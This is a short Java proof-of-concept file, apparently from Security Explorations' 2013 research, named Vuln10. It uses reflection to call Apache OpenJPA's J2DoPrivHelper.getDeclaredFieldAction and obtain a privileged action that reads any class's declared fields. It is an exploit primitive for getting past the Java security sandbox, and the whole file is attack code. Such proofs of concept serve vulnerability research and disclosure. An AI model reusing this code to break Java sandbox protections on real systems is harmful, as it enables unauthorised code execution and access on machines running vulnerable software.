/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* org.apache.openjpa.lib.util.J2DoPrivHelper                                 */
/* access to privileged action object obtaining a declared field of a class   */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.io.*;
import java.lang.reflect.*;
import java.security.*;

public class Vuln10 {

  public static PrivilegedExceptionAction get_privileged_action(PrintWriter out,Class clazz,String name) {
    PrivilegedExceptionAction res=null;

    try {
      Class c=Class.forName("org.apache.openjpa.lib.util.J2DoPrivHelper");

      Class ctab[]=new Class[2];
      ctab[0]=Class.forName("java.lang.Class");
      ctab[1]=Class.forName("java.lang.String");

      Method mgetaction=c.getMethod("getDeclaredFieldAction",ctab);

      Object args[]=new Object[2];
      args[0]=clazz;
      args[1]=name;

      res=(PrivilegedExceptionAction)mgetaction.invoke(null,args);                  
     } catch(Throwable t) {
      t.printStackTrace(out);
     }

     return res;
   }
}
